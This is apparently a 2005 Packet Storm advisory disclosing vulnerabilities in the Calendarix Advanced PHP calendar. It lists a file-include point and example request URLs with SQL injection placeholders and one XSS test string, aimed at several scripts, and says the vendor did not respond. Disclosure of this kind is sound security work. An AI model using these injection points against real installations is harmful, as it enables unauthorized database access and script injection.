calendarix.txt

2005-08-14T00:00:00
ID PACKETSTORM:39367
Type packetstorm
Reporter Dark Bicho
Modified 2005-08-14T00:00:00

Description

                                        
                                            `/***********************************************  
* Advisorie : 01-0005-15  
* title: multiple vulnerability  
* Software: Calendarix Advanced   
* Date: 28. April 2005  
* Web: http://www.calendarix.com/  
************************************************/  
  
  
- Affected software description:  
  
Webcalendar is a web software write in php y mysql   
  
- Expoit:  
  
Include   
  
line 16   
admin/cal_admintop.php:include_once ($calpath."cal_utils.php");  
  
xss and sql injection  
  
line 122 - 160  
cal_day.php?op=day&date=2005-05-03&catview=1[sql]/*  
cal_pophols.php?id=999'[sql]/*   
line 23  
calendar.php?op=cal&month=5&year=2'%3Ch1%3DarkBicho005&catview=1  
line 194 - 196  
cal_week.php?op=week&catview= 999'[sql]/*  
line 34 - 39  
cal_cat.php?op=cats&catview=999'[sql]*/  
  
  
- How to fix:  
  
Vendor no responds  
  
- Credits:  
  
DarkBicho  
Email: darkbicho@gmail.com  
Web: http://www.swp-scene.org  
  
  
- Grettings:  
"A mi Team SWP"  
" Viva el Peru Carajo"  
  
--   
- - - - - - - - - - - - - - - - - - - - - - - - -   
Miguel Sumaran (DarkBicho)  
webpage: http://www.darkbicho.tk/  
Team : http://www.swp-scene.org/  
Made in Peru  
- - - - - - - - - - - - - - - - - - - - - - - - -  
`